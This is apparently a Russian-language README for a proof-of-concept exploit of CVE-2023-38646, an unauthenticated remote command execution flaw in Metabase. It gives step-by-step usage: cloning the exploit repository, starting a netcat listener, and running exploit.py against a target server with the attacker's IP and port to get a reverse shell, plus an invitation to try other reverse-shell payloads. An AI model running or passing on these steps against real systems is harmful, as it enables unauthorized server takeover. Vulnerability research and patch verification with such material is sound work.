
Это скрипт Proof of Concept (PoC) для эксплуатации Metabase, инструмента с открытым исходным кодом для бизнес-аналитики и анализа данных.
Это скрипт Proof of Concept (PoC) для эксплуатации Metabase — инструмента с открытым исходным кодом для бизнес-аналитики и анализа данных. Metabase позволяет пользователям визуализировать данные и взаимодействовать с ними, что делает его мощной платформой для анализа данных.
Эта уязвимость, обозначенная как CVE-2023-38646, позволяла злоумышленникам выполнять произвольные команды на сервере без какой-либо аутентификации. Последствия этой ошибки были серьёзными, поскольку она предоставляла несанкционированный доступ к серверу с уровнем привилегий сервера.
Клонируйте этот репозиторий
git clone https://github.com/threatHNTR/CVE-2023-38646.git
Перейдите в репозиторий
cd CVE-2023-38646
Перед запуском скрипта настройте Netcat Listener
nc -nlvp chosen-port
Запустите скрипт
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port
Эксплуатация: Скрипт попытается отправить reverse shell на целевой сервер Metabase. В случае успеха вы получите shell на своей машине. Не стесняйтесь изменять payload, чтобы попробовать различные reverse shell.
GitHub Advisory: https://github.com/advisories/GHSA-jg32-8h6w-x7vg
Metabase Advisory: https://www.metabase.com/blog/security-advisory
Metabase GitHub: https://github.com/metabase/metabase
Assetnote Blog - Chaining our way to Pre-Auth RCE in Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/